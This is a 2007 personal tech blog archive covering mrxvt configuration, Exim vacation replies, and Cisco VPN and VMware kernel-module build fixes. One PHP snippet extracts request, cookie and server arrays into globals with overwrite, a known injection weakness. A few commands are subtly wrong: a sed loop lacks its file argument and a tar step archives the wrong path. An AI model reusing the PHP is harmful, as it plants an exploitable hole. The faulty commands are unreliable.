With a little side of applesauce...

Wednesday, February 28, 2007

sample .mxrvtrc file

I am posting this here, as the original site might be going away for good... I had to grab this from Google's cache:

# Sample configuration for mrxvt-0.5.0. To use, copy it to ~/.mrxvtrc.
#
# This sets up a pseudo-transparent terminal with black tinted background, Xft
# font, a transparent Firefox style tab-bar, and a next style scroll bar.
#
# Additionally, using the -name option you can get the following behaviour:
#
# Full screen:
# Start mrxvt with "mrxvt -name FullScreen". Produces a full screen
# terminal.
#
# Kitchen Sink:
# Start mrxvt with "mrxvt -name KitchenSink". This produces an mrxvt
# window with three tabs on startup. It loads your shell in the first tab,
# and vim and mutt in the other two tabs. There aren't any other
# applications you need to load anyway... ;)
#
# FvwmConsole:
# Produces a small blue tinted terminal, mainly for use as an fvwm
# console. Just load the FvwmConsole module with
#
# FvwmConsole -terminal mrxvt
#
# and these settings will be used.
#
# Root:
# Start mrxvt with "mrxvt -name Root". This produces a green tinted mrxvt
# windows which loads a root shell in the first tab. Ctrl+Shift+t opens a
# new tab as root, and Ctrl+Shift+n opens a new tab as a regular user.
#

Mrxvt.geometry: 69x22
Mrxvt.greektoggle_key: F20

#
# ----------------------------- TAB-BAR OPTIONS ------------------------------ #
#

Mrxvt.bottomTabbar: False
Mrxvt.initTermNumber: 3

# Only show the tab bar if there is more than one tab.
Mrxvt.autohideTabbar: False

# The number of tabs to attempt to keep visible. The width of tabs will shrink
# to keep at least these many tabs visible.
Mrxvt.minVisibleTabs: 8

# The max width in chars for each tab (only used with x11 fonts, or if xftPFont
# is not specified).
# Mrxvt.maxTabWidth: 17

# Hide left / right / close buttons in the tab bar.
# Mrxvt.hideButtons: True

# Make the terminal title the same as the active tab title.
Mrxvt.syncTabTitle: True
# Mrxvt.syncTabIcon: true

# Highlight inactive tabs only when they sound a bell (and not whenever they
# produce output).
Mrxvt.highlightTabOnBell: True

# Tab bar colors
Mrxvt.itabBackground: #101010
Mrxvt.tabBackground: #000000
Mrxvt.itabForeground: #909090
Mrxvt.tabForeground: #9a9a9a

# Mrxvt.tabbarPixmap: tabbarbg.png
# Mrxvt.tabUsePixmap: false

#
# ---------------------- SCROLLING / SCROLLBAR OPTIONS ----------------------- #
#

Mrxvt.scrollBar: true
Mrxvt.scrollbarRight: true
Mrxvt.scrollbarStyle: rxvt

# Number of lines to save in the scroll back buffer for all tabs
Mrxvt.saveLines: 500

# Don't scroll to the bottom every time some output is produced.
Mrxvt.scrollTtyOutputInhibit: true

# Scroll to the bottom when a key is pressed.
Mrxvt.scrollTtyKeypress: true

# Scroll bar colors
Mrxvt.scrollColor: #808080
Mrxvt.troughColor: #202020

# Mrxvt.scrollbarPixmap: scrollbarbg.jpg


#
# ------------------------------- TRANSPARENCY ------------------------------- #
#

# True translucency (using Xorg's composite extension).
# Mrxvt.opacity: 75
# Mrxvt.opacityDegree: 5

# Pseudo transparency. As long as you set the background using an esetroot
# compatible program (e.g. feh), then the following will work. It is pretty
# resource friendly too :).
Mrxvt.transparent: True
Mrxvt.transparentScrollbar: True
Mrxvt.transparentTabbar: True
Mrxvt.transparentMenubar: False

# Color / degree to which the root background should be tinted.
Mrxvt.tintColor: #000000
Mrxvt.shading: 75

#
# ---------------------------------- FONTS ----------------------------------- #
#
Mrxvt.xft: 1
Mrxvt.xftFont: Bitstream Vera Sans Mono
Mrxvt.xftSize: 14
Mrxvt.xftAntialias: 1

# The options below are better set using ~/.fonts.config. Mrxvt will use the
# defaults passed to the fontconfig library.
#
# Mrxvt.xftHinting: 1
# Mrxvt.xftAutoHint: 1
# Mrxvt.xftGlobalAdvance: 1
# Mrxvt.xftRGBA: rgb
# Mrxvt.xftslow: 1

# Don't load a multi-char font. This will reduce the line space if your multi
# char font has different dimensions than the regular font. You might need to
# comment it out if you want to use XIM and non-english fonts.
Mrxvt.xftNomFont: 1

# Font to use for tab bar / menus. This need not be mono-spaced ;).
Mrxvt.xftPFont: Bitstream Vera Sans
Mrxvt.xftPSize: 10

# Shadow text
# Mrxvt.textShadow: red
# Mrxvt.textShadowMode: botright

#
# XIM input / multi char support. To use this, you should also comment out the
# xftNomFont line above.
#
# Mrxvt.xftmFont: SimSun
# Mrxvt.multichar_encoding: GB
# Mrxvt.inputMethod: SCIM

#
# ---------------------------------- CURSOR ---------------------------------- #
#
Mrxvt.cursorBlink: true
Mrxvt.cursorColor: #00ff00
Mrxvt.cursorColor2: #000000

#
# ---------------------------------- COLORS ---------------------------------- #
#

# Setup colors for a black background.
Mrxvt.background: #000000
Mrxvt.foreground: #9a9a9a

Mrxvt.color0: #000000
Mrxvt.color1: #af0000
Mrxvt.color2: #00af00
Mrxvt.color3: #afaf00
Mrxvt.color4: #0000af
Mrxvt.color5: #af00af
Mrxvt.color6: #00afaf
Mrxvt.color7: #9a9a9a
Mrxvt.color8: #5f5f5f
Mrxvt.color9: #d70000
Mrxvt.color10: #00d700
Mrxvt.color11: #d7d700
Mrxvt.color12: #0000d7
Mrxvt.color13: #d700d7
Mrxvt.color14: #00d7d7
Mrxvt.color15: #d7d7d7

# Display bold and underlined text in color, rather than using the terminal
# attributes. This makes reading man pages a little easier.
Mrxvt.colorBD: #00afaf
Mrxvt.colorUL: #00af00
# Mrxvt.colorRV: #000040

# Display the X selection as highlighted instead of using reverse video.
Mrxvt.highlightColor: #303060

# Colors when terminal window looses focus. (Does not work well with Xft).
# Mrxvt.ufBackground: yellow
# Mrxvt.backgroundFade: 50

#
# ------------------------------- MISC OPTIONS ------------------------------- #
#

# The value of the TERM environment variable. Default is rxvt. If you have
# trouble, try uncommenting the following line.
Mrxvt.termName: xterm

# Default title of each tab.
#Mrxvt.tabTitle: mrxvt
Mrxvt.vt0.tabTitle: Term 1
Mrxvt.vt1.tabTitle: Term 2
Mrxvt.vt2.tabTitle: Term 3

# Border to leave around terminal text
Mrxvt.internalBorder: 2

# Make double click select whole URL's
Mrxvt.cutChars: :=/~#@?%&_-.0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ0abcdefghijklmnopqrstuvwxyz

# Blank the mouse pointer on keystrokes or after 10 seconds of inactivity.
Mrxvt.pointerBlank: True
Mrxvt.pointerBlankDelay: 10

# Don't close the tab if the secondary screen is displayed (e.g. when running
# vim).
Mrxvt.protectSecondary: True

# Run as a login shell.
# Mrxvt.loginShell: True

# Enable session management
# Mrxvt.sessionMgt: true

#
# --------------------------------- PROFILES --------------------------------- #
#

# Root console on profile 1. Matrix like green font for root :).
Mrxvt.profile1.foreground: #809a70
Mrxvt.profile1.background: #002000
Mrxvt.profile1.command: su
Mrxvt.profile1.tabTitle: su

# Better to start root consoles in root's home directory (and not the current
# directory).
Mrxvt.profile1.workingDirectory:/root/home
# Mrxvt.profile1.Pixmap: matrix.jpg

# Vim on profile 2. Vim is run in a shell, so after Vim exits, you'll get the
# shell prompt.
Mrxvt.profile2.command: su
# Mrxvt.profile2.Pixmap: vim.png

# Mutt on profile 3. Kill the scroll back buffer, to save a little memory.
# Mrxvt.profile3.Pixmap: email.jpg
# Mrxvt.profile3.saveLines: 0
Mrxvt.profile3.command: su
# Mrxvt.profile3.workingDirectory:

#
# ---------------------------- KEYBOARD SHORTCUTS ---------------------------- #
#

Mrxvt.macro.Shift+Left: GotoTab -1
Mrxvt.macro.Shift+Right: GotoTab +1

# Open profiles 1 -- 4 on Ctrl+Shift+F1 -- F4.
Mrxvt.macro.Ctrl+Shift+F1: NewTab -1
Mrxvt.macro.Ctrl+Shift+F2: NewTab -2
Mrxvt.macro.Ctrl+Shift+F3: NewTab -3
Mrxvt.macro.Ctrl+Shift+F4: NewTab -4

#
# Save the scroll back buffer to a file, and open it (in less / vim) in a new
# tab. Useful for searching, or cut/paste from the scroll back buffer.
#
Mrxvt.macro.Primary+Ctrl+Shift+question: PrintScreen -ps perl -e '$_=join("",); s/\n+$/\n/g; print' > /tmp/scrollback
Mrxvt.macro.Primary+Add+Ctrl+Shift+question: NewTab "(Search)" /bin/sh -c "less -ifLR +G /tmp/scrollback; rm /tmp/scrollback"

Mrxvt.macro.Primary+Ctrl+slash: PrintScreen -s perl -e '$_=join("",); s/\n+$/\n/g; print' > /tmp/scrollback
Mrxvt.macro.Primary+Add+Ctrl+slash: NewTab "(Search)" /bin/sh -c 'view +"syn off|set nospell notitle |normal G" /tmp/scrollback; rm /tmp/scrollback'


# ---------------------------------------------------------------------------- #

#
# CLASS SETTINGS
#

#
# ------------------------------- FULL SCREEN -------------------------------- #
#
FullScreen.bottomTabbar: False

# Set a large font ;)
FullScreen.xftSize: 17
FullScreen.xftPSize: 12

# Keep as many tabs as possible on screen
FullScreen.minVisibleTabs: 15

# Set the window size increment to 1, so that the X server can resize our window
# to the screen size without leaving any border.
FullScreen.smoothResize: True

# Request a full screen window from the window manager. Requires a EWMH
# compatible window manager. This certainly works on OpenBox, Fvwm, KDE, and
# possibly many others.
FullScreen.fullscreen: False


#
# ------------------------------- KITCHEN SINK ------------------------------- #
#
# Number of tabs to launch initially
KitchenSink.initProfileList: 0,2,3


#
# ------------------------------- FVWM CONSOLE ------------------------------- #
#
FvwmConsole.initProfileList: 4
FvwmConsole.profile4.tabTitle: FvwmConsole
FvwmConsole.profile4.background: #101020

FvwmConsole.xftSize: 12
FvwmConsole.tintColor: #181830
FvwmConsole.geometry: 60x15
FvwmConsole.scrollBar: False

#
# ------------------------------- ROOT CONSOLE ------------------------------- #
#

Root.initProfileList: 1
Root.tintColor: #002000
Root.itabBackground: #002000

# ---------------------------------------------------------------------------- #
# vim: set ft=mrxvtrc ts=8 sts=4:


The original was at:
www.oesf.org/forums/index.php?act=Attach&type=post&id=2779

Tuesday, February 27, 2007

WebCT Vista - Pet Peeves

1. I have been using WebCT Vista for online courses for about three years now, so have many files uploaded into my files area... This is confusing when many professors use similar naming schemes for assignments :(

2. Java... I use 64-bit ubuntu, and use Swiftfox for most 32-bit codecs, etc... BUT, sometimes Java works better in Swiftfox, then others in Epiphany, and, when all else fails, Konqueror finally comes through... (This is probably more of a platform issue though...) Sometimes I completely give up and send it to my wifes Windows machine... (Which currently cannot login to WebCT Vista, because of a jvm issue...). (Konqueror worked tonight :) ).

Tuesday, February 20, 2007

Outlook 2003 - add From header

To add a from header in Outlook 2003:
New Message->View->From Field

Saturday, February 17, 2007

Windows / True X-Mouse - Highlight and click to paste

For those who miss the ability to highlight text and then middle click to paste, (a la X), you should try out:
http://fy.chalmers.se/~appro/nt/TXMouse/

<snip>

Over the years Microsoft (being under the user community pressure) has undertaken some half-hearted attempts to bring the fewer-clicks functionality to Windows. Yet the most far reaching TweakUI (see PowerToys for Windows XP for XP version) goes only about one fifth of the way. Indeed, to an average X11-user the expression "X-Mouse" means the following:   

  1. Keyboard focus follows mouse pointer instantly (the only one that can be achieved with TweakUI, annoyingly enough accompanied by the "quality" to raise the window upon click).

  2. Marked text is placed into the paste buffer instantly on left button release.

  3. Pasting is done with a single middle button click. (The latter two are implemented in couple of applications - only to feel more acutely the lack of it in the rest of the windows!)

  4. Ability to lower windows with right button click on window decoration.

  5. Autoraise (if engaged) is delayed relative to input refocusing.

All of the above is what this "True X-Mouse Gizmo" is about:-)

</snip>

Just download the exe:

http://fy.chalmers.se/~appro/nt/TXMouse/TXMouse.exe

and place a shortcut in your StartUp folder. It isn't exactly GNOME, but with TXMouse and xkeymacs, I have never enjoyed writing in Microsoft Word so much :)


Wednesday, February 14, 2007

xkeymacs

One of the reasons that I love GNOME so much, is that I can set Emacs keybindings globally in the gconf-editor. Now, (that I am stuck on Windows for a time, I have found xkeymacs:
http://www.cam.hi-ho.ne.jp/oishi/indexen.html

One trick, (so far), is to disable C-t (transpose-chars) for firefox, as it blocks the shortcut for opening a new tab. (I saw one person who set C-x 2 (split-window-vertically) for opening a new tab, but didn't take the time to learn how to do it...)

Tuesday, February 13, 2007

Firefox / Thunderbird / Gaim - Migrate profiles from GNU/Linux to Windows

I found that you can migrate profiles from GNU/Linux to Windows by copying the appropriate folders from your home directory:

Gaim:
1. copy ~/.gaim to
C:\Documents and Settings\username\Application Data\

Firefox:
1. copy ~/.mozilla/firefox/someGarbage.default to
C:\Documents and Settings\user\Application Data\Mozilla\Firefox\Profiles

Thunderbird:
1. copy ~/.mozilla-thunderbird/someGarbage.default to
C:\Documents and Settings\user\Application Data\Thunderbird\Profiles

The GNU/Linux distro is Ubuntu, and I pulled the profiles from an external harddrive with Explore2fs.

Windows XP - symbolic links

After trying to find the built-in ability for creating symbolic links in Windows XP Home Edition, (there is not), I finally ran into the Junction tool from SysInternals:
http://www.microsoft.com/technet/sysinternals/FileAndDisk/Junction.mspx

This worked well! I also found Winbolic Link:
http://www.pearlmagik.com/winbolic/

But, didn't test this out. I also thought about doing it in Cygwin, but I wanted to move "My Documents" to a larger partition, so didn't think that Windows would honor the symlinks created in Cygwin...

BTW, "folder redirection", which is what I assume is the built-in tool for creating symlinks in Windows, only comes with versions that can join a domain, as it is controlled by group policy. (Home and Media Center are not designed for joining domains, though there appears to be a way around this:
http://www.everythingtech.tv/2006/07/12/how-to-get-windows-media-center-2005-to-join-a-domain/
).

Monday, February 12, 2007

PHP - removing $_POST/$_GET prefixes from variables

I know that JP has sent this code to me a thousand times, but I still had to go looking for it again tonight... :P

 <?php
// register vars if register_globals disabled
if ( !ini_get( 'register_globals')) {
$types_to_register = array( 'GET', 'POST',
'COOKIE'
, 'SESSION', 'SERVER');
foreach ($types_to_register as $type ) {
if (@ count(${ 'HTTP_' . $type . '_VARS'}) > 0) {
extract(${ 'HTTP_' . $type . '_VARS'},
EXTR_OVERWRITE);
}
}
}
?>

http://www.artbuilders.com/Weblogs_Gintz/Archives/000053.html

PHP - print form variables to screen

I know, I know... I have been working with PHP for years... But, really... I have basically troubleshot other people's PHP for years :P Now, I am gathering some real foundational knowledge of PHP, so here is the first thing I need to remember:

print_r($_POST);

Will print the variables which were POSTed to this page. (You can use any of the $_ARRAYs in the same manner).

Sunday, February 11, 2007

Norton/Symantec - blocking outgoing TLS/SSL email connections

I had some great instructions on how to turn of email auto-protection in Norton Security and Symantec, (which was blocking outgoing mail sent over a TLS/SSL connection), but can't seem to find them now :( Here is a link for Symantec 9:
http://www.depts.ttu.edu/helpcentral/email/upgrade/disable_sav9_email_scan.php

Norton/Symantec Anti-Virus for Windows v2002 through v2006: http://computing.camden.rutgers.edu/windows/email/disablenorton_pc.php

Friday, February 9, 2007

vacation - auto-responding _and_ forwarding to another email

You can add a forwarding email account to the .forward like this:
\username, newemail@example.com, "|/usr/bin/vacation username"

This will send a copy of the message to username@localhost _and_ newemail@example.com, plus reply to the sender with the auto-response that you set up in the .vacation.msg

Exim4 - vacation messages

Add the following router to:
router/600_exim4-config_userforward:

# This router delivers a "vacation" message if a file called 'vacation.msg'
# exists in the home directory.
uservacation:
driver = accept
domains = +local_domains
# user to put away message in a file called vacation.msg
require_files = /home/${local_part}/vacation.msg
# do not reply to errors or lists or with ADV in the subject
condition = ${if or { \
{match {$h_precedence:} {(?i)junk|bulk|list}} \
{eq {$sender_address} {}} \
{match {$h_subject:} {(ADV|Adv)}} \
} {no} {yes}}
no_expn
# do not reply to errors or bounces or lists
senders = ! ^.*-request@.*:\
! ^bounce-.*@.*:\
! ^.*-bounce@.*:\
! ^owner-.*@.*:\
! ^postmaster@.*:\
! ^webmaster@.*:\
! ^listmaster@.*:\
! ^mailer-daemon@.*:\
! ^root@.*
transport = uservacation_transport
unseen
no_verify


Add the following transport:
transport/30_exim4-config_address_pipe

# This transport is used for vacation messages
uservacation_transport:
driver = autoreply
file = /home/${local_part}/vacation.msg
file_expand
# if using MailScanner setup with two config files
# must be able to write as the user exim runs as
# because calling with -C will not run as root
# http://www.exim.org/pipermail/exim-users/Week-of-Mon-20020715/041328.html
# once = /var/log/exim/vacation/$local_part-vacation.db
# if not using MailScanner setup try something like
once = /home/${local_part}/.vacation.db
# to use a flat file instead of a db specify once_file_size
#once_file_size = 2K
once_repeat = 14d
from = $local_part@domain.com
to = $sender_address
subject = "Re: $h_subject"
# text that will be included in message above what is in user's vacation.msg
text = "This is an automatic reply. Please feel free to send additional\n\
mail, as only this one notice will be generated.\n\
================================================\n\n"
#...


Install the vacation package:
apt-get install vacation

Initialize your vacation database:
me@mymail:~$ vacation
This program will answer your mail automatically when you go away on vacation.
You need to put in the ~/.vacation.msg file the reply message.
Would you like to create it (y/N)? y
To enable the vacation program a '~/.forward' file is created.
Would you like to enable the vacation program (y/N)? y
You have a '~/.forward' file containing:

|/usr/bin/procmail

It needs to be renamed before the vacation program can be enabled.
Do you want to proceed (y/N)? y
The vacation program is ENABLED.
me@mymail:~$ cat .forward
\me, "|/usr/bin/vacation me"
me@mymail:~$ emacs .vacation.msg
Subject: RE: $SUBJECT

I am on vacation until....

Thanks!
me

You can then run vacation again to turn it off...

Thursday, February 8, 2007

Apache - Multiple .htaccess files

We just found out that Apache merges multiple .htaccess files, by adding files as an array to the AccessFileName directive:

AccessFileName .htaccess .userconfig


This allows us to give write access to .userconfig, while keeping our authentication configuration in the .htaccess file, (which is Denied in the httpd.conf). Here is an example of the contents of a .userconfig file:

RewriteEngine On
RewriteRule ^(.*)$ http://www.example.com


This will merge into the contents of the .htaccess file, which could be something like:

<LimitExcept GET POST>
require group adminGroup
</LimitExcept>

Ubuntu - php-mode fails to install

I have been getting the following errors when trying to install php-mode (emacs21 and emacs-snapshot):

Setting up php-mode (0.1-1) ...
install/php-mode: Handling install for emacsen flavor emacs21
While compiling toplevel forms in file /usr/share/emacs21/site-lisp/php-mode/php-mode.el:
!! Wrong type argument ((stringp nil))
Wrote /usr/share/emacs21/site-lisp/php-mode/php3-mode.elc
Done
emacs-package-install: /usr/lib/emacsen-common/packages/install/php-mode emacs21 emacs21 failed at /usr/lib/emacsen-common/emacs-package-install line 30, line 1.
dpkg: error processing php-mode (--install):
subprocess post-installation script returned error exit status 1
Errors were encountered while processing:
php-mode


The problem seems to revolve around the SITEFLAG variable, which is set in:

emacs-extras-0.1/debian/php-mode.emacsen-install


The --no-site-file flag tells emacs _not_ to load the /etc/emacs/site-start.el file, but mine was empty, so I simply removed the flag and was able to install php-mode. Here is how I did it on Ubuntu Feisty:

sudo apt-get source php-mode
cd emacs-extras-0.1/


Apply the following patch:

--- php-mode.emacsen-install.orig 2007-02-08 01:07:16.000000000 -0600
+++ php-mode.emacsen-install 2007-02-08 00:57:19.000000000 -0600
@@ -16,7 +16,7 @@
if [ ${FLAVORTEST} = xemacs ] ; then
SITEFLAG="-no-site-file"
else
- SITEFLAG="--no-site-file"
+ SITEFLAG=""
fi
FLAGS="${SITEFLAG} -q -batch -l path.el -f batch-byte-compile"

And, then compile the binary packages:

sudo debian/rules binary
sudo dpkg -i ../php-mode_0.1-1_all.deb


NOTE: I didn't need to change anything else for eiffel-mode, emacs-extra, or tiger-mode to compile and install correctly.

Wednesday, February 7, 2007

Windows Vista - I give up...

I was going to swap out harddrives, and run Windows Vista for awhile, (to get familiar with it), but am now writing this from Ubuntu Feisty. It feels like the GNU/Linux experience has now bypassed Windows...

The final straw...? When I rebooted today and received a blank screen, also noted for NVIDIA cards:
http://forums.nvidia.com/lofiversion/index.php?t21804.html
http://tozon.info/blogs/andrej/archive/2006/09/04/Installing-Windows-Vista-on-NX7010-_2D00_-blank-screen.aspx

Anyways, without access to Windows through Safe Mode, nor the command prompt (through Safe Mode), nor any of these through an external monitor, I am going back to Ubuntu, "which just works"...

Tuesday, February 6, 2007

Microsoft Vista Business - install from files on local machine

I tried to install Windows Vista from a local set of files that I had copied to my system, but found that I could not search the file system when prompted to insert Disk 2. (I had started the install from a local install of the Disk 1 folder). To get around this, I moved the ISO images to the local machine, (I don't have a DVD burner), and then installed the Microsoft Virtual CD-ROM Control Panel. You then run VCdControlTool and follow these instructions:

a. Run the VCdControlTool.exe program.
b. In Virtual CDRom Control Panel, click Driver Control.
c. In Virtual CR-Rom Driver Control, click Install Driver.
d. Locate the %systemroot%\System32\Driver folder, click VCdRom.sys, and then click Open.
e. In Virtual CR-Rom Driver Control, click Start, and then click OK.
f. In Virtual CDRom Control Panel, click Add Drive, and then click Mount.
g. Select the .ISO image that you want to mount, and then click Open.
h. In Select Mount Options, click Ok.

http://support.microsoft.com/?kbid=916902

This mounts the ISO image as a "network drive", which can be viewed in Windows Explorer. You then start the Vista installation from the Disk 1 ISO image (which is now mounted on y:\, for example), and when prompted for each subsequent image, you eject the previous ISO image and mount the next one.

thunderbird extensions

Here are the links to my favourite thunderbird extensions:

gmailui:
http://www.longshot.com/~kmixter/gmailui.html

keyconfig:
http://mozilla.dorando.at/readme.html

mailredirect:
http://mailredirect.mozdev.org/

Monday, February 5, 2007

Cisco vpnclient - Ubuntu Feisty - kernel 2.6.20 - Patching quick reference

Here are all three changes that I needed to make for:
Cisco Systems VPN Client Version 4.8.00 (0490)

to get it to work on Ubuntu Feisty (kernel 2.6.20):

$ cd /path/to/vpnclient
$ for f in interceptor.c; do \
> sed -i "s?skb_checksum_help(skb,0)?skb_checksum_help(skb)?" $f ; done
$ for f in $(grep -r -l CHECKSUM_HW *); do \
> sed -i "s?CHECKSUM_HW?CHECKSUM_COMPLETE?"; done | grep CHECKSUM
$ for f in $(grep -r -l config.h *); do \
> sed -i "s?linux/config.h?linux/autoconf.h?" $f ; done



Cisco vpnclient - Linux kernel 2.6.20 interceptor.h skb_checksum_help (too many arguments)

Next, we needed to fix the skb_checksum_help function, which previously took two arguments. Here is the error:

Making module
make -C /lib/modules/2.6.20-6-generic/build SUBDIRS=/home/speeves/downloads/vpnclient modules
make[1]: Entering directory `/usr/src/linux-headers-2.6.20-6-generic'
CC [M] /home/speeves/downloads/vpnclient/interceptor.o
In file included from /home/speeves/downloads/vpnclient/Cniapi.h:15,
from /home/speeves/downloads/vpnclient/interceptor.c:30:
/home/speeves/downloads/vpnclient/GenDefs.h:110:2: warning: #warning 64 bit
/home/speeves/downloads/vpnclient/interceptor.c: In function ‘handle_vpnup’:
/home/speeves/downloads/vpnclient/interceptor.c:310: warning: assignment from incompatible pointer type
/home/speeves/downloads/vpnclient/interceptor.c:334: warning: assignment from incompatible pointer type
/home/speeves/downloads/vpnclient/interceptor.c:335: warning: assignment from incompatible pointer type
/home/speeves/downloads/vpnclient/interceptor.c: In function ‘do_cleanup’:
/home/speeves/downloads/vpnclient/interceptor.c:378: warning: assignment from incompatible pointer type
/home/speeves/downloads/vpnclient/interceptor.c: In function ‘recv_ip_packet_handler’:
/home/speeves/downloads/vpnclient/interceptor.c:557: error: too many arguments to function ‘skb_checksum_help’
/home/speeves/downloads/vpnclient/interceptor.c: In function ‘do_cni_send’:
/home/speeves/downloads/vpnclient/interceptor.c:683: error: too many arguments to function ‘skb_checksum_help’
make[2]: *** [/home/speeves/downloads/vpnclient/interceptor.o] Error 1
make[1]: *** [_module_/home/speeves/downloads/vpnclient] Error 2
make[1]: Leaving directory `/usr/src/linux-headers-2.6.20-6-generic'
make: *** [default] Error 2


Here is the fix:

$ cd /path/to/vpnclient
$ for f in interceptor.c; do \
> sed -i "s?skb_checksum_help(skb,0)?skb_checksum_help(skb)?" $f ; done

Reference:
http://www.tuxx-home.at/projects/cisco-vpnclient/vpnclient-linux-2.6.19.diff

Cisco vpnclient - Linux kernel 2.6.20 interceptor.h CHECKSUM_HW

After fixing the problem with the missing linux/config.h, I then received:

Making module
make -C /lib/modules/2.6.20-6-generic/build SUBDIRS=/home/speeves/downloads/vpnclient modules
make[1]: Entering directory `/usr/src/linux-headers-2.6.20-6-generic'
CC [M] /home/speeves/downloads/vpnclient/interceptor.o
In file included from /home/speeves/downloads/vpnclient/Cniapi.h:15,
from /home/speeves/downloads/vpnclient/interceptor.c:30:
/home/speeves/downloads/vpnclient/GenDefs.h:110:2: warning: #warning 64 bit
/home/speeves/downloads/vpnclient/interceptor.c: In function ‘handle_vpnup’:
/home/speeves/downloads/vpnclient/interceptor.c:310: warning: assignment from incompatible pointer type
/home/speeves/downloads/vpnclient/interceptor.c:334: warning: assignment from incompatible pointer type
/home/speeves/downloads/vpnclient/interceptor.c:335: warning: assignment from incompatible pointer type
/home/speeves/downloads/vpnclient/interceptor.c: In function ‘do_cleanup’:
/home/speeves/downloads/vpnclient/interceptor.c:378: warning: assignment from incompatible pointer type
/home/speeves/downloads/vpnclient/interceptor.c: In function ‘recv_ip_packet_handler’:
/home/speeves/downloads/vpnclient/interceptor.c:557: error: too many arguments to function ‘skb_checksum_help’
/home/speeves/downloads/vpnclient/interceptor.c: In function ‘do_cni_send’:
/home/speeves/downloads/vpnclient/interceptor.c:683: error: too many arguments to function ‘skb_checksum_help’
make[2]: *** [/home/speeves/downloads/vpnclient/interceptor.o] Error 1
make[1]: *** [_module_/home/speeves/downloads/vpnclient] Error 2
make[1]: Leaving directory `/usr/src/linux-headers-2.6.20-6-generic'
make: *** [default] Error 2
Copying module to directory "/lib/modules/2.6.20-6-generic/CiscoVPN".


This is fixed thusly:

$ cd /path/to/vpnclient
$ for f in $(grep -r -l CHECKSUM_HW *); do \
> sed -i "s?CHECKSUM_HW?CHECKSUM_COMPLETE?"; done | grep CHECKSUM


Reference:
http://www.tuxx-home.at/projects/cisco-vpnclient/vpnclient-linux-2.6.19.diff

Cisco vpnclient - Linux kernel 2.6.20 linux/config.h missing

The source code provided with:
Cisco Systems VPN Client Version 4.8.00 (0490)

looks for linux/config.h, but that file was replaced in kernel 2.6.19 with linux/autoconf.h, which gives the following error:

Making module
make -C /lib/modules/2.6.20-6-generic/build SUBDIRS=/home/speeves/downloads/vpnclient modules
make[1]: Entering directory `/usr/src/linux-headers-2.6.20-6-generic'
CC [M] /home/speeves/downloads/vpnclient/linuxcniapi.o
/home/speeves/downloads/vpnclient/linuxcniapi.c:12:26: error: linux/config.h: No such file or directory
In file included from /home/speeves/downloads/vpnclient/Cniapi.h:15,
from /home/speeves/downloads/vpnclient/linuxcniapi.c:27:
/home/speeves/downloads/vpnclient/GenDefs.h:110:2: warning: #warning 64 bit
make[2]: *** [/home/speeves/downloads/vpnclient/linuxcniapi.o] Error 1
make[1]: *** [_module_/home/speeves/downloads/vpnclient] Error 2
make[1]: Leaving directory `/usr/src/linux-headers-2.6.20-6-generic'
make: *** [default] Error 2
Copying module to directory "/lib/modules/2.6.20-6-generic/CiscoVPN".


You can fix this by:

$ cd /path/to/vpnclient
$ for f in $(grep -r -l config.h *); do \
> sed -i "s?linux/config.h?linux/autoconf.h?" $f ; done
$ sudo ./vpn_install

VMware beta 6 - problem building vmblock

After patching vmmon (compat_kernel.h), I also had a problem building vmblock:

Extracting the sources of the vmblock module.

Building the vmblock module.

Using 2.6.x kernel build system.
make: Entering directory `/tmp/vmware-config4/vmblock-only'
make -C /lib/modules/2.6.20-6-generic/build/include/.. SUBDIRS=$PWD SRCROOT=$PWD/. modules
make[1]: Entering directory `/usr/src/linux-headers-2.6.20-6-generic'
CC [M] /tmp/vmware-config4/vmblock-only/linux/block.o
/tmp/vmware-config4/vmblock-only/linux/block.c:40: warning: ‘kmem_cache_t’ is deprecated
CC [M] /tmp/vmware-config4/vmblock-only/linux/control.o
CC [M] /tmp/vmware-config4/vmblock-only/linux/dentry.o
In file included from /tmp/vmware-config4/vmblock-only/linux/dentry.c:17:
/tmp/vmware-config4/vmblock-only/linux/filesystem.h:86: warning: ‘kmem_cache_t’ is deprecated
CC [M] /tmp/vmware-config4/vmblock-only/linux/file.o
In file included from /tmp/vmware-config4/vmblock-only/linux/file.c:17:
/tmp/vmware-config4/vmblock-only/linux/filesystem.h:86: warning: ‘kmem_cache_t’ is deprecated
/tmp/vmware-config4/vmblock-only/linux/file.c: In function ‘FileOpOpen’:
/tmp/vmware-config4/vmblock-only/linux/file.c:105: error: dereferencing pointer to incomplete type
/tmp/vmware-config4/vmblock-only/linux/file.c: In function ‘FileOpRelease’:
/tmp/vmware-config4/vmblock-only/linux/file.c:201: error: dereferencing pointer to incomplete type
make[2]: *** [/tmp/vmware-config4/vmblock-only/linux/file.o] Error 1
make[1]: *** [_module_/tmp/vmware-config4/vmblock-only] Error 2
make[1]: Leaving directory `/usr/src/linux-headers-2.6.20-6-generic'
make: *** [vmblock.ko] Error 2
make: Leaving directory `/tmp/vmware-config4/vmblock-only'
Unable to build the vmblock module.

The vmblock module enables dragging or copying files from within a guest and
dropping or pasting them onto your Linux host (guest to host drag and drop and
file copy/paste). The rest of the software provided by VMware Workstation is
designed to work independently of this feature (including guest to host drag
and drop and file copy/paste).

If you would like the guest to host drag and drop and file copy/paste features,
you can install the driver by running vmware-config.pl again after making sure
that gcc, binutils, make and the kernel sources for your running kernel are
installed on your machine. These packages are available on your distribution's
installation CD.
[ Press Enter key to continue ]


The fix is to change "SLAB_KERNEL" to "GFP_KERNEL" in vmblock-only/linux/super.c:

1. cd /usr/lib/vmware/modules/source
2. tar -xvf vmblock.tar
3. sudo vi vmblock-only/linux/super.c


--- super.c.orig 2007-02-05 07:15:08.000000000 -0600
+++ super.c 2007-02-05 07:06:12.000000000 -0600
@@ -66,7 +66,7 @@
{
VMBlockInodeInfo *iinfo;

- iinfo = kmem_cache_alloc(VMBlockInodeCache, SLAB_KERNEL);
+ iinfo = kmem_cache_alloc(VMBlockInodeCache, GFP_KERNEL);
if (!iinfo) {
Warning("SuperOpAllocInode: could not allocate iinfo\n");
return NULL;


4. tar -cf vmblock.tar vmblock.tar
5. sudo vmware-config.pl

http://www.vmware.com/community/message.jspa?messageID=545590#545590

VMware beta 6 - patch for compat_kernel.h

I had a problem compiling the vmmon kernel module for VMware beta 6 (and VMware 5.5.3), when running on Ubuntu Feisty and kernel >= 2.6.20. The error was:

CC [M] /tmp/vmware-config0/vmmon-only/linux/driver.o
In file included from /tmp/vmware-config0/vmmon-only/linux/driver.c:80:
